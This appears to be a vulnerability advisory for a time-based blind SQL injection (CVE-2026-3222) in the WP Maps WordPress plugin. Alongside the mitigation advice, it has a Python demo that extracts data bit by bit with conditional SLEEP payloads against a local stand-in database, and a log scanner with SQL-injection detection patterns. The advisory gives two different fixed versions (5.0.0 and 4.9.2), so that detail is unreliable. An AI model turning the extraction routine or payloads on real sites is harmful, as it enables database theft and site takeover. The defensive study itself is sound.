Platform
wordpress
Component
wp-google-map-plugin
Fixed in
5.0.0
CVE-2026-3222 is a time-based blind SQL injection vulnerability in the WP Maps plugin (wp-google-map-plugin) for WordPress. The plugin's wpgmpajaxcall AJAX handler is reachable without authentication, and the location_id parameter it receives is used in a database query without sanitization, so an unauthenticated attacker can inject SQL and infer query results from the server's response time. Versions of WP Maps prior to 4.9.2 are affected; upgrading to 4.9.2 or later fixes the flaw.
Successful exploitation of CVE-2026-3222 could allow an attacker to extract sensitive data from the WordPress database. Because the injection is time-based and blind, the attacker sees no query output and must infer the data one bit (or one character) at a time by measuring how long the server takes to respond; this is slower than an error- or union-based injection but no less effective. WordPress databases typically hold user credentials (password hashes), customer data and other confidential information, so the potential impact is significant: an attacker who recovers an administrator's credentials could take complete control of the site, modify content or delete data. The fact that the wpgmpajaxcall handler is accessible to unauthenticated users, exposes plugin class method calls and passes the unsanitized location_id parameter into a query makes the issue worse, since no account is needed to reach the vulnerable code.
CVE-2026-3222 was publicly disclosed on March 11, 2026. While no active exploitation campaigns have been publicly confirmed, the vulnerability's ease of exploitation and the prevalence of WordPress sites make it a potential target. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are likely to emerge, increasing the risk of widespread exploitation.
Exploit status
EPSS
0.21% (43rd percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-3222 is to upgrade the WP Maps plugin to version 4.9.2 or later immediately. If upgrading is not feasible right away because of compatibility or testing requirements, apply a temporary server-side workaround: validate the location_id parameter before it reaches any database query, for example by casting it to an integer (WordPress's absint()) and binding it into the query through $wpdb->prepare() rather than string concatenation. A Web Application Firewall (WAF) with SQL injection rules adds a further layer of protection; for this issue the relevant rules are those that flag backticks, quotes and MySQL timing functions such as SLEEP() or BENCHMARK() in user-supplied input, since a legitimate location ID is a plain integer and should never contain them. After upgrading, verify the fix by sending a request to the wpgmpajaxcall endpoint whose location_id carries a time-delay payload (for example a SLEEP() condition) and confirming that the response comes back without the delay; a patched handler should reject or neutralize the value rather than execute it.
Update to version 4.9.2 or a newer patched version
A time-based blind SQL injection is an attack in which the attacker infers information from the database by observing the server's response times. The query returns no visible output, so the attacker crafts conditions that make the server delay its response when the condition is true, and deduces the data from how long each request takes.
It allows an attacker to read sensitive database information, modify data, or even gain control of the website, which can have severe security and privacy consequences.
As a temporary measure, restrict access to the wpgmpajaxcall AJAX endpoint to authenticated users and monitor server logs for suspicious activity, such as requests to the endpoint (normally via admin-ajax.php with action=wpgmpajaxcall) whose location_id is anything other than a plain integer.
If you are using a version of WP Maps prior to 4.9.2, your website is vulnerable. You can confirm this with a vulnerability scanner, or by checking the installed plugin version in the WordPress admin under Plugins.
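To make the "infer the data bit by bit" mechanism from the impact section and the explanation above concrete, here is an added example that is not part of this advisory or of the WP Maps plugin. It uses an in-memory SQLite database with a constructed stand-in schema (not the plugin's real tables or query), emulates MySQL's SLEEP() with a user-defined function, and shows the vulnerable string-concatenation pattern beside a hardened form that casts and binds the parameter. The extraction routine only ever gets a yes/no timing answer per request, yet recovers a full string.

```python
import sqlite3
import time
from typing import Callable

# Constructed in-memory stand-in for the WordPress database (not the plugin's real schema).
# SQLite is used so the example runs offline; MySQL's SLEEP() is emulated with a UDF.
DELAY = 0.1  # seconds the injected SLEEP() stalls the query when the condition is true


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHash')")
    conn.execute("CREATE TABLE wp_gmp_locations (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO wp_gmp_locations VALUES (7, 'Head office')")

    def sleep_udf(seconds: float) -> int:
        time.sleep(seconds)
        return 0

    conn.create_function("SLEEP", 1, sleep_udf)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, location_id: str) -> list:
    """Vulnerable pattern: the request parameter is concatenated straight into SQL."""
    sql = f"SELECT name FROM wp_gmp_locations WHERE id = {location_id}"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn: sqlite3.Connection, location_id: str) -> list:
    """Hardened form: cast to int first (what WordPress absint() does) and bind the value
    with a placeholder (what $wpdb->prepare() does), so no SQL can be smuggled in."""
    loc = int(location_id)  # raises ValueError for anything that is not an integer
    return conn.execute("SELECT name FROM wp_gmp_locations WHERE id = ?", (loc,)).fetchall()


def timing_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """One 'request': inject a conditional delay and report whether the server stalled.
    Against MySQL the payload would read 7 AND IF((cond), SLEEP(0.1), 0); CASE is the portable form."""
    payload = f"7 AND (CASE WHEN ({condition}) THEN SLEEP({DELAY}) ELSE 0 END)"
    start = time.monotonic()
    vulnerable_lookup(conn, payload)
    return time.monotonic() - start >= DELAY / 2


def extract_string(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the value of SQL expression `expr` using only yes/no timing answers:
    binary-search its length, then binary-search each character's code point."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # ASCII range; MySQL spells unicode()/substr() as ORD()/SUBSTRING()
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def run_demo() -> str:
    """Extract the first user's login through the vulnerable handler, one bit at a time."""
    conn = make_db()
    return extract_string(lambda cond: timing_oracle(conn, cond),
                          "(SELECT user_login FROM wp_users WHERE ID = 1)")


if __name__ == "__main__":
    print(run_demo())  # admin
```

Each character costs seven timed requests, which is why the technique is slow but still reliable; lowering DELAY speeds it up at the price of more false readings on a noisy network. The hardened lookup refuses the payload before any query runs, which is the behaviour the post-upgrade verification in the mitigation section should observe.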
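The WAF rules in the mitigation section and the log-monitoring advice above both reduce to the same check: a location_id sent to the wpgmpajaxcall action should be a plain integer, and anything else (backticks, quotes, SLEEP()/BENCHMARK(), SQL keywords) deserves attention. The following added example (not code from this advisory or from the plugin) runs that check over constructed Apache combined-format access log lines; the IPs, timestamps and requests are made up. It assumes the action is reached through admin-ajax.php, as WordPress AJAX actions normally are, and only sees GET query strings, since POST bodies are not written to an access log.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/Nginx combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Patterns a WAF rule for this issue would match inside a user-supplied location_id.
SUSPICIOUS = [
    ("backtick", re.compile(r"`")),
    ("quote", re.compile(r"['\"]")),
    ("timing_function", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.IGNORECASE)),
    ("sql_keyword", re.compile(r"\b(?:select|union|and|or|if)\b", re.IGNORECASE)),
]

# Constructed sample log lines (fictitious addresses and requests) for the demo.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2026:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=wpgmpajaxcall&location_id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Mar/2026:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=wpgmpajaxcall&location_id=7%20AND%20SLEEP%285%29 HTTP/1.1" 200 0 "-" "python-requests/2.31"',
    '203.0.113.5 - - [11/Mar/2026:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=wpgmpajaxcall&location_id=7%60 HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '198.51.100.9 - - [11/Mar/2026:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=other_action&location_id=1%27 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [11/Mar/2026:10:00:05 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]


def classify_location_id(value: str) -> list:
    """Reasons a location_id value should not be trusted; an empty list means it is a plain integer."""
    if re.fullmatch(r"\d+", value):
        return []
    reasons = ["non_numeric"]
    reasons += [name for name, rx in SUSPICIOUS if rx.search(value)]
    return reasons


def scan_access_log(lines) -> list:
    """Return findings for requests to action=wpgmpajaxcall whose location_id is not a plain integer.
    Only GET query strings are visible here; POST bodies need a WAF or application audit log."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("admin-ajax.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
        if qs.get("action", [""])[0] != "wpgmpajaxcall":
            continue
        for value in qs.get("location_id", []):
            reasons = classify_location_id(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "location_id": value,
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The first sample line is a normal request and produces no finding; the second carries a SLEEP() condition and the third a backtick, so both are reported with their reasons. The same classify_location_id() check is what a temporary server-side filter or a custom WAF rule would apply to the parameter before the plugin sees it.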
You can find more information about CVE-2026-3222 in vulnerability databases such as the National Vulnerability Database (NVD) and on the WP Maps support forums.